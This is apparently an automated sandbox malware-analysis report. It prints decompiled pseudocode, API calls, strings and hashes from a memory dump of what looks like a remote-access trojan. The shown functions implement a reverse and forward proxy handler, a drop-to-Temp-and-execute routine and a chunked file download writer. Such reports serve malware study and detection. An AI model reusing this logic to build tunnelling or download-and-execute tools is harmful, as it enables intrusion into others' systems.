																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E0042F3BB(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E0042F4EF();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E0042F3BB(_v12 ^ _t463);
					}
				}
				L130:
			}

0x0043cf2d
0x0043cf30
0x0043cf32
0x0043cf35
0x0043cf36
0x0043cf3f
0x0043cf47
0x0043cf49
0x0043cf4b
0x0043cf4e
0x0043d067
0x0043d06c
0x0043cf54
0x0043cf54
0x0043cf55
0x0043cf55
0x0043cf58
0x0043cf5b
0x0043cf5d
0x0043cf60
0x0043cf60
0x0043cf63
0x0043cf65
0x0043cf68
0x0043cf6d
0x0043cf7b
0x0043cf85
0x0043cf88
0x0043cf8b
0x0043cf8b
0x0043cf96
0x0043cf9b
0x0043cfa0
0x00000000
0x0043cfa6
0x0043cfa9
0x0043cfa9
0x0043cfac
0x0043cfae
0x0043cfb1
0x0043cfb1
0x0043cfb1
0x0043cfb3
0x0043cfb3
0x0043cfb3
0x0043cfb9
0x00000000
0x00000000
0x0043cfbe
0x0043cfd5
0x0043cfd5
0x0043cfc0
0x0043cfc0
0x0043cfc8
0x00000000
0x0043cfca
0x0043cfca
0x0043cfcd
0x0043cfd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0043cfd3
0x0043cfc8
0x0043cfde
0x0043cfe3
0x0043cfe5
0x0043cfea
0x0043cfed
0x0043cff0
0x0043cff3
0x0043cff6
0x0043cff8
0x0043cffd
0x0043d007
0x0043d00f
0x0043d017
0x00000000
0x0043d01d
0x0043d021
0x0043d06e
0x0043d074
0x0043d077
0x0043d07a
0x0043d07c
0x0043d080
0x0043d084
0x0043d086
0x0043d089
0x0043d08e
0x0043d084
0x0043d08f
0x0043d092
0x0043d094
0x0043d096
0x0043d09a
0x0043d09b
0x0043d09d
0x0043d0a0
0x0043d0a5
0x0043d09b
0x0043d0a8
0x0043d0ab
0x0043d0ae
0x0043d0b1
0x0043d0b4
0x0043d0b4
0x0043d023
0x0043d023
0x0043d026
0x0043d029
0x0043d02b
0x0043d02f
0x0043d033
0x0043d035
0x0043d038
0x0043d03d
0x0043d033
0x0043d03e
0x0043d043
0x0043d045
0x0043d04a
0x0043d04c
0x0043d04f
0x0043d054
0x0043d04a
0x0043d055
0x0043d059
0x0043d059
0x0043d05c
0x0043d060
0x0043d063
0x0043d063
0x00000000
0x0043d066
0x00000000
0x0043d017
0x0043cfd9
0x0043cfdb
0x0043cfdb
0x00000000
0x0043cfdb
0x0043d0bb
0x0043d0bc
0x0043d0bd
0x0043d0be
0x0043d0bf
0x0043d0c0
0x0043d0c5
0x0043d0c8
0x0043d0c9
0x0043d0cb
0x0043d0d1
0x0043d0d8
0x0043d0db
0x0043d0de
0x0043d0df
0x0043d0e0
0x0043d0e3
0x0043d0e4
0x0043d0e7
0x0043d0ed
0x0043d0ef
0x0043d114
0x0043d11e
0x0043d124
0x0043d126
0x0043d12c
0x0043d12e
0x0043d381
0x0043d382
0x00000000
0x0043d134
0x0043d134
0x0043d138
0x0043d29f
0x0043d29f
0x0043d2b6
0x0043d2bb
0x0043d2be
0x0043d2c0
0x0043d2c6
0x0043d2c6
0x0043d2c8
0x0043d2c8
0x0043d2cb
0x0043d2cd
0x0043d2d3
0x0043d2d3
0x0043d2d5
0x0043d35c
0x0043d35c
0x0043d2db
0x0043d2db
0x0043d2dd
0x0043d2e3
0x0043d2e6
0x0043d2e9
0x0043d2ef
0x00000000
0x00000000
0x0043d2f1
0x0043d2f5
0x0043d31e
0x0043d31e
0x0043d320
0x0043d2f7
0x0043d2f7
0x0043d2fb
0x0043d2ff
0x0043d306
0x0043d30c
0x00000000
0x0043d30e
0x0043d30e
0x0043d311
0x0043d314
0x0043d31c
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d31c
0x0043d30c
0x0043d32b
0x0043d32b
0x0043d32d
0x0043d35b
0x0043d35b
0x00000000
0x0043d32f
0x0043d32f
0x0043d335
0x0043d336
0x0043d337
0x0043d338
0x0043d33d
0x0043d343
0x0043d346
0x0043d348
0x0043d34f
0x0043d351
0x0043d353
0x0043d34a
0x0043d34a
0x0043d34b
0x00000000
0x0043d34b
0x0043d348
0x00000000
0x0043d32d
0x0043d324
0x0043d326
0x0043d329
0x0043d329
0x00000000
0x0043d329
0x0043d362
0x0043d362
0x0043d363
0x0043d366
0x0043d36c
0x0043d36c
0x0043d375
0x0043d377
0x00000000
0x0043d379
0x0043d379
0x00000000
0x0043d379
0x0043d377
0x00000000
0x0043d13e
0x0043d13e
0x0043d143
0x00000000
0x0043d149
0x0043d149
0x0043d14e
0x00000000
0x0043d154
0x0043d154
0x0043d15a
0x0043d15f
0x0043d161
0x0043d168
0x0043d169
0x0043d16b
0x00000000
0x00000000
0x0043d171
0x0043d171
0x0043d175
0x0043d17b
0x00000000
0x0043d181
0x0043d183
0x0043d184
0x0043d187
0x00000000
0x0043d18d
0x0043d18d
0x0043d193
0x0043d198
0x0043d1a2
0x0043d1a6
0x0043d1ab
0x0043d1ae
0x0043d1b0
0x00000000
0x0043d1b2
0x0043d1b2
0x0043d1b4
0x0043d1b7
0x0043d1b7
0x0043d1ba
0x0043d1bd
0x0043d1bd
0x0043d1c8
0x0043d1ca
0x0043d1cc
0x00000000
0x00000000
0x0043d1cc
0x00000000
0x0043d1ce
0x0043d1ce
0x0043d1d4
0x0043d1d7
0x0043d1d7
0x0043d1e5
0x0043d1ee
0x0043d1f3
0x0043d1f9
0x0043d1fc
0x0043d1fd
0x0043d1ff
0x0043d20d
0x0043d20d
0x0043d214
0x0043d275
0x00000000
0x0043d216
0x0043d216
0x0043d224
0x0043d229
0x0043d22c
0x0043d22e
0x0043d39e
0x0043d3a0
0x0043d3a1
0x0043d3a2
0x0043d3a3
0x0043d3a4
0x0043d3a5
0x0043d3aa
0x0043d3ad
0x0043d3ae
0x0043d3b6
0x0043d3bd
0x0043d3c0
0x0043d3c1
0x0043d3c4
0x0043d3c8
0x0043d3c9
0x0043d3cc
0x0043d3dc
0x0043d3e8
0x0043d3ff
0x0043d404
0x0043d407
0x0043d409
0x0043d41e
0x0043d421
0x0043d421
0x0043d424
0x0043d42a
0x0043d433
0x0043d435
0x0043d438
0x0043d43f
0x0043d442
0x0043d448
0x00000000
0x00000000
0x0043d44a
0x0043d44e
0x0043d477
0x0043d477
0x0043d450
0x0043d450
0x0043d454
0x0043d458
0x0043d45f
0x0043d465
0x00000000
0x0043d467
0x0043d467
0x0043d46a
0x0043d46d
0x0043d475
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d475
0x0043d465
0x0043d484
0x0043d484
0x0043d486
0x0043d48c
0x0043d492
0x0043d495
0x0043d495
0x0043d498
0x0043d49b
0x0043d49b
0x0043d4ab
0x0043d4b9
0x0043d4be
0x0043d4c5
0x0043d4c7
0x00000000
0x0043d4cd
0x0043d4d3
0x0043d4d9
0x0043d4e0
0x0043d4e6
0x0043d4e9
0x0043d4ef
0x0043d4fc
0x0043d503
0x0043d508
0x0043d50b
0x0043d50d
0x0043d766
0x0043d76c
0x0043d76d
0x0043d76e
0x0043d76f
0x0043d770
0x0043d771
0x0043d776
0x0043d777
0x0043d77c
0x0043d513
0x0043d513
0x0043d521
0x0043d524
0x0043d53f
0x0043d546
0x0043d54c
0x0043d552
0x0043d526
0x0043d526
0x0043d52e
0x00000000
0x0043d530
0x0043d530
0x0043d536
0x0043d536
0x0043d52e
0x0043d559
0x0043d55c
0x0043d679
0x0043d67c
0x0043d689
0x0043d68c
0x0043d694
0x0043d694
0x0043d67e
0x0043d684
0x0043d684
0x0043d562
0x0043d562
0x0043d568
0x0043d570
0x0043d572
0x0043d575
0x0043d57e
0x0043d587
0x0043d58d
0x0043d58d
0x0043d590
0x0043d592
0x00000000
0x00000000
0x0043d594
0x0043d59a
0x0043d59b
0x0043d5a6
0x0043d5ae
0x0043d5b6
0x0043d5b9
0x0043d5bc
0x0043d5c2
0x0043d5c8
0x0043d5ce
0x0043d5d4
0x0043d5d7
0x00000000
0x00000000
0x0043d5d9
0x0043d5fe
0x0043d5fe
0x0043d601
0x0043d605
0x0043d61e
0x0043d623
0x0043d626
0x0043d628
0x0043d62e
0x0043d669
0x0043d630
0x0043d630
0x0043d635
0x0043d63d
0x0043d63e
0x0043d63e
0x0043d655
0x0043d65c
0x0043d65f
0x0043d664
0x0043d664
0x0043d66c
0x0043d66f
0x0043d66f
0x0043d674
0x00000000
0x0043d674
0x0043d5db
0x0043d5dd
0x0043d5e2
0x0043d5e8
0x0043d5f1
0x0043d5fa
0x0043d5fa
0x00000000
0x0043d5dd
0x0043d697
0x0043d697
0x0043d69b
0x0043d6a3
0x0043d6a9
0x0043d6ac
0x0043d6b2
0x0043d6b4
0x0043d6f4
0x0043d6fa
0x0043d701
0x0043d701
0x0043d707
0x0043d70b
0x00000000
0x0043d70d
0x0043d70d
0x0043d711
0x0043d716
0x0043d71a
0x0043d71f
0x0043d726
0x0043d734
0x0043d73a
0x0043d73d
0x0043d73d
0x0043d70b
0x0043d74c
0x0043d754
0x0043d75d
0x0043d6b6
0x0043d6bc
0x0043d6bf
0x0043d6c6
0x0043d6d8
0x0043d6df
0x0043d6ec
0x00000000
0x0043d6ec
0x00000000
0x0043d6b4
0x0043d50d
0x0043d488
0x00000000
0x0043d488
0x00000000
0x0043d486
0x0043d47f
0x0043d481
0x0043d481
0x00000000
0x0043d40b
0x0043d40b
0x0043d40b
0x0043d40d
0x0043d412
0x0043d41d
0x0043d41d
0x0043d234
0x0043d234
0x0043d237
0x0043d23c
0x0043d399
0x00000000
0x0043d242
0x0043d244
0x0043d24c
0x0043d252
0x0043d253
0x0043d259
0x0043d25a
0x0043d25f
0x0043d262
0x0043d264
0x0043d26a
0x0043d26c
0x0043d26d
0x0043d26d
0x0043d27b
0x0043d27b
0x0043d27e
0x0043d280
0x0043d283
0x0043d291
0x0043d291
0x0043d37b
0x0043d37b
0x00000000
0x0043d37d
0x0043d37d
0x00000000
0x0043d285
0x0043d285
0x0043d288
0x0043d28b
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d28b
0x0043d283
0x0043d23c
0x0043d22e
0x0043d201
0x0043d203
0x0043d204
0x0043d207
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d207
0x0043d1ff
0x0043d187
0x00000000
0x0043d17b
0x00000000
0x0043d298
0x0043d14e
0x0043d143
0x0043d138
0x0043d0f1
0x0043d0f1
0x0043d0f3
0x0043d0f5
0x0043d0f6
0x0043d0f7
0x0043d0f8
0x0043d0fd
0x0043d388
0x0043d38d
0x0043d398
0x0043d398
0x0043d0ef
0x00000000

APIs

Part of subcall function 0043E13D: RtlAllocateHeap.NTDLL(00000000,0042F6B9,?,?,00430DF7,?,?,00000000,?,?,0040B6B7,0042F6B9,?,?,?,?), ref: 0043E16F

_free.LIBCMT ref: 0043D038
_free.LIBCMT ref: 0043D04F
_free.LIBCMT ref: 0043D06E
_free.LIBCMT ref: 0043D089
_free.LIBCMT ref: 0043D0A0

Strings

\^)|/, xrefs: 0043D0D1
HcE, xrefs: 0043CF80

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: HcE$\^)|/
API String ID: 3033488037-2665423744
Opcode ID: 111cf453a2bba794fcc5b39a5ffe5510bc587b0db9956dd9635b267cac9bfd76
Instruction ID: c80edba0b78c00ba8c7ff3a24b2447aa4006447d7a3b6fdbe65dbfded01c6576
Opcode Fuzzy Hash: 111cf453a2bba794fcc5b39a5ffe5510bc587b0db9956dd9635b267cac9bfd76
Instruction Fuzzy Hash: 7951C271A00204ABDB24DF6ADC42B6A77F5EF5D728F10126EE809D7291E739DD028B49

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0AB, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040F0AB(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t23;
				void* _t29;
				char* _t32;
				intOrPtr _t45;
				char* _t46;
				char* _t53;
				char* _t58;
				intOrPtr _t110;
				void* _t114;
				void* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t134 = __eflags;
				_t101 = __edx;
				_push(_t61);
				_t110 = _a4;
				E00402036(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
				SetEvent( *(_t110 + 0x34));
				_t23 = L00401EF9( &_v80);
				E00404153( &_v80,  &_v56, 4, 0xffffffff);
				_t126 = (_t123 & 0xfffffff8) - 0x3c;
				E00402036(_t61, _t126, _t101, _t134, 0x46b218);
				_t127 = _t126 - 0x18;
				E00402036(_t61, _t127, _t101, _t134,  &_v72);
				_t29 = E00416EC5( &_v112, _t101);
				_t128 = _t127 + 0x30;
				_t114 =  *_t23 - 0x46;
				if(_t114 == 0) {
					_t32 = L00409D76(L00401EF9(L00401DAD( &_v88, _t101, __eflags, 1)));
					_t61 = _t32;
					__eflags = _t32;
					if(__eflags == 0) {
						_t115 = _t128 - 0x18;
						_push("1");
						L19:
						_t101 = E0040704B( &_v32, L00401DAD( &_v88, _t101, __eflags, 0), 0x46b218);
						E004051FC(_t61, _t115, _t34, _t110, __eflags);
						_push(0x85);
						L0040495D(_t61, _t110, _t34, __eflags);
						L00401F11();
						L20:
						L00401DD8( &_v108, _t101);
						L00401F11();
						L00401F11();
						return 0;
					}
					_t117 = L00409DCC(_t61, "StartForward");
					 *0x46ad38 = _t117;
					 *0x46ad34 = L00409DCC(_t61, "StartReverse");
					 *0x46ad3c = L00409DCC(_t61, "StopForward");
					_t45 = L00409DCC(_t61, "StopReverse");
					_t101 = "GetDirectListeningPort";
					 *0x46ad44 = _t45;
					_t46 = L00409DCC(_t61, "GetDirectListeningPort");
					 *0x46ad40 = _t46;
					__eflags = _t117;
					if(__eflags == 0) {
						L17:
						_t115 = _t128 - 0x18;
						_push(0x45eb70);
						goto L19;
					}
					__eflags =  *0x46ad34;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46ad3c;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t46;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46ad48 = 1;
					E00402036(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401DAD( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					L0040495D(_t61, _t110, _t101, __eflags);
					goto L20;
				}
				_t118 = _t114 - 1;
				if(_t118 == 0) {
					_t53 =  *0x46ad38(L00435E19(_t50, L00401EF9(L00401DAD( &_v88, _t101, __eflags, 0))));
					_t132 = _t128 - 0x14;
					L9:
					_t101 = _t53;
					L00416C0A(_t61, _t132, _t53);
					_push(0x77);
					goto L10;
				}
				_t119 = _t118 - 1;
				if(_t119 == 0) {
					__imp__#12( *0x46b754);
					_t58 =  *0x46ad34(_t29, L00435E19(_t55, L00401EF9(L00401DAD( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
					__eflags = _t58;
					_t99 =  !=  ? 1 :  *0x46ad49 & 0x000000ff;
					 *0x46ad49 =  !=  ? 1 :  *0x46ad49 & 0x000000ff;
					_t101 = _t58;
					L00416C0A(_t61, _t128 - 0x10, _t58);
					_push(0x78);
					goto L10;
				}
				_t121 = _t119 - 1;
				if(_t121 == 0) {
					_t53 =  *0x46ad3c();
					_t132 = _t128 - 0x18;
					goto L9;
				}
				if(_t121 == 1) {
					 *0x46ad44();
					 *0x46ad49 = 0;
				}
				goto L20;
			}

0x0040f0ab
0x0040f0ab
0x0040f0b8
0x0040f0bb
0x0040f0c2
0x0040f0ca
0x0040f0d4
0x0040f0e8
0x0040f0ed
0x0040f0f7
0x0040f0fc
0x0040f106
0x0040f10f
0x0040f114
0x0040f117
0x0040f11a
0x0040f1fe
0x0040f203
0x0040f205
0x0040f207
0x0040f2b2
0x0040f2b4
0x0040f2b9
0x0040f2d5
0x0040f2d9
0x0040f2df
0x0040f2e6
0x0040f2ef
0x0040f2f4
0x0040f2f8
0x0040f301
0x0040f30a
0x0040f317
0x0040f317
0x0040f219
0x0040f222
0x0040f232
0x0040f243
0x0040f24a
0x0040f24f
0x0040f254
0x0040f25b
0x0040f260
0x0040f265
0x0040f267
0x0040f2a3
0x0040f2a6
0x0040f2a8
0x00000000
0x0040f2a8
0x0040f269
0x0040f270
0x00000000
0x00000000
0x0040f272
0x0040f279
0x00000000
0x00000000
0x0040f27b
0x0040f27d
0x00000000
0x00000000
0x0040f285
0x0040f297
0x0040f29c
0x0040f1de
0x0040f1e0
0x00000000
0x0040f1e0
0x0040f120
0x0040f123
0x0040f1ca
0x0040f1d0
0x0040f1d3
0x0040f1d3
0x0040f1d7
0x0040f1dc
0x00000000
0x0040f1dc
0x0040f129
0x0040f12c
0x0040f15f
0x0040f185
0x0040f195
0x0040f197
0x0040f19d
0x0040f1a3
0x0040f1a7
0x0040f1ac
0x00000000
0x0040f1ac
0x0040f12e
0x0040f131
0x0040f14e
0x0040f154
0x00000000
0x0040f154
0x0040f136
0x0040f13c
0x0040f142
0x0040f142
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040F0CA
inet_ntoa.WS2_32 ref: 0040F15F

Strings

GetDirectListeningPort, xrefs: 0040F24F
StartForward, xrefs: 0040F20D
StopForward, xrefs: 0040F22D
StartReverse, xrefs: 0040F21B
StopReverse, xrefs: 0040F23E

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: d65704c07283be1ae7df3e717b75df7922632430060d90571615c11dca5fdd81
Instruction ID: 3ef049b106d2e1365757ce49ddfded88444d7121f09e1b2d60a8f18e81ccdb93
Opcode Fuzzy Hash: d65704c07283be1ae7df3e717b75df7922632430060d90571615c11dca5fdd81
Instruction Fuzzy Hash: B351D571A047019BC614F775C85A62E36A69B81309F40053FF901BBAE2EE7D9D1C878F

Uniqueness

Uniqueness Score: -1.00%

Function 004137DA, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004137DA(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00401FCE(_t60,  &_v136, "\\");
				_t86 = E0040713C(_t60,  &_v112, E00438F1A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				E00402ECA(_t60,  &_v28, _t35, _t93,  &_a4);
				E00401F11();
				_t68 =  &_v136;
				E00401F11();
				_push(_t68);
				_push(_t68);
				_t41 = E00413A17(E0040D70B( &_v316, _t35, _t93, E00401EF9( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00401FCE(_t60, _t90 - 0x18, 0x45e65c);
					_push(0x6f);
					_t73 = 0x46b7c8;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00413A27( &_v316,  &_a28, _t94);
					E0040D6BC( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401EF9( &_v28);
					asm("movaps xmm0, [0x4650a0]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00401FCE(_t60, _t90, 0x45e65c);
						_push(0x70);
						E0040495D(_t60, 0x46b7c8,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401EF9( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00401FCE(_t60, _t90 - 0x18, 0x45e65c);
						_push(0x6e);
						_t73 = 0x46b7c8;
						L6:
						E0040495D(_t60, _t73, _t86, _t97);
					}
				}
				E0040CDE7(_t60,  &_v316, 0x45e65c);
				E00401F11();
				E00401F11();
				return E00401F11();
			}

0x004137da
0x004137f5
0x00413811
0x00413816
0x0041381f
0x00413824
0x0041382a
0x0041382f
0x00413830
0x0041384d
0x00413852
0x00413854
0x00413915
0x0041391a
0x0041391c
0x00000000
0x0041385a
0x0041385a
0x00413863
0x0041386e
0x00413873
0x0041387a
0x0041387e
0x00413885
0x0041388c
0x00413891
0x00413898
0x0041389f
0x004138b5
0x004138b8
0x004138bc
0x004138c4
0x004138c9
0x004138cd
0x004138d7
0x004138e0
0x004138ef
0x004138ef
0x004138f5
0x004138f8
0x00413900
0x00413905
0x00413907
0x00413921
0x00413921
0x00413921
0x004138f8
0x0041392c
0x00413934
0x0041393c
0x0041394f

APIs

Part of subcall function 00413A27: __EH_prolog.LIBCMT ref: 00413A2C

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,Function_0005E65C), ref: 004138D7
CloseHandle.KERNEL32(00000000), ref: 004138E0
DeleteFileA.KERNEL32(00000000), ref: 004138EF
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004138A3

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

Strings

<, xrefs: 0041387E
@, xrefs: 00413885
Temp, xrefs: 004137FB

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 1768e6a506c994b3513728adaa35b778943cc50760def6e0b7c10b22b849e9e5
Instruction ID: 17c11719d5aee54e591ff2941b1f6efa278b84b33e2da5664cf7b6ac1314e7a0
Opcode Fuzzy Hash: 1768e6a506c994b3513728adaa35b778943cc50760def6e0b7c10b22b849e9e5
Instruction Fuzzy Hash: 2F41C071A0020A9BCB04FBA1CD56AEE7B75AF50309F50017EF505760E2EF781B89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405DF1(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E004500D0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0040320E(0,  &_v48, __eflags, E0040708E( &_v72,  &_a12, __eflags, L".part"));
				E00401E54();
				_t37 = CreateFileW(E00401E4F( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = E00401E4F( &_a12);
					MoveFileW(E00401E4F( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00404A12( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E00401FF5(_t58, _t82, _t74, _t85,  &_v12, 8);
								E0040495D(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(E00401E4F( &_v48));
						}
					}
				}
				L9:
				E00401E54();
				E00401E54();
				return _t58;
			}

0x00405df9
0x00405e02
0x00405e06
0x00405e09
0x00405e0c
0x00405e0e
0x00405e1b
0x00405e28
0x00405e30
0x00405e4a
0x00405e53
0x00405e56
0x00405e59
0x00405ecb
0x00405ecc
0x00405ed5
0x00405ee4
0x00405eea
0x00405e5b
0x00405e5b
0x00405e5e
0x00000000
0x00405e60
0x00405e60
0x00405e63
0x00000000
0x00405e65
0x00405e65
0x00405e65
0x00405e74
0x00405e79
0x00405e7b
0x00405e7c
0x00405e83
0x00405e92
0x00405e98
0x00405ea3
0x00405ead
0x00405eb4
0x00000000
0x00000000
0x00405ebc
0x00405ebf
0x00000000
0x00405ec8
0x00405ec8
0x00000000
0x00405ec8
0x00000000
0x00405ebf
0x00405f08
0x00405f17
0x00405f17
0x00405e63
0x00405e5e
0x00405eec
0x00405eef
0x00405ef7
0x00405f04

APIs

Part of subcall function 0040708E: char_traits.LIBCPMT ref: 004070A9

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00405E4A
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00405E92
CloseHandle.KERNEL32(00000000), ref: 00405ECC
MoveFileW.KERNEL32(00000000,00000000), ref: 00405EE4
CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 00405F08
DeleteFileW.KERNEL32(00000000), ref: 00405F17

Strings

.part, xrefs: 00405E13

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part
API String ID: 820096542-3499674018
Opcode ID: fff6667317198c5af3f8485aac9a6c5c4614f2dae9973b1223294f684879e4ba
Instruction ID: 1a211a693a5cd11246f5506265df4b93aded23446ae2726ad9f7fb816fedd3d0
Opcode Fuzzy Hash: fff6667317198c5af3f8485aac9a6c5c4614f2dae9973b1223294f684879e4ba
Instruction Fuzzy Hash: BE317A71D00209ABCB04EFA5DD469EEB778EB44705F10857BF811B3191DB78AE48CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0043B56A, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043B55F,00000003,?,0043B4FF,00000003,00467140,0000000C,0043B612,00000003,00000002), ref: 0043B58A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043B59D
FreeLibrary.KERNEL32(00000000,?,?,?,0043B55F,00000003,?,0043B4FF,00000003,00467140,0000000C,0043B612,00000003,00000002,00000000), ref: 0043B5C0

Strings

CorExitProcess, xrefs: 0043B595
@, xrefs: 0043B5AE
mscoree.dll, xrefs: 0043B583
\^)|/, xrefs: 0043B571

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

